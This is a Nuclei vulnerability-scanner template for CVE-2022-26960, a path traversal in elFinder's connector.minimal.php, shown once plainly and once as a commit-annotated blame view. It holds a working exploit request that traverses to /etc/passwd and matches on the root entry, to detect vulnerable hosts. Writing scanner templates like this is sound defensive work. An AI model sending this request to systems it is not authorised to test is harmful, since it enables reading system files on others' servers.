nuclei-templates/cves/2022/CVE-2022-26960.yaml

id: CVE-2022-26960

info:
  name: elFinder - Path Traversal
  author: pikpikcu
  severity: high
  description: |
    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
  metadata:
    verified: true
  tags: cve,cve2022,lfi,elfinder

requests:
  - raw:
      - |
        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`id: CVE-2022-26960`

			`info:`
			`name: elFinder - Path Traversal`
			`author: pikpikcu`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00			`severity: high`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`description: \|`
			`Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.`
			`reference:`
			`- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-26960`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00			`metadata:`
			`verified: true`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`tags: cve,cve2022,lfi,elfinder`

			`requests:`
			`- raw:`
			`- \|`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00			`GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00
			`- type: status`
			`status:`
			`- 200`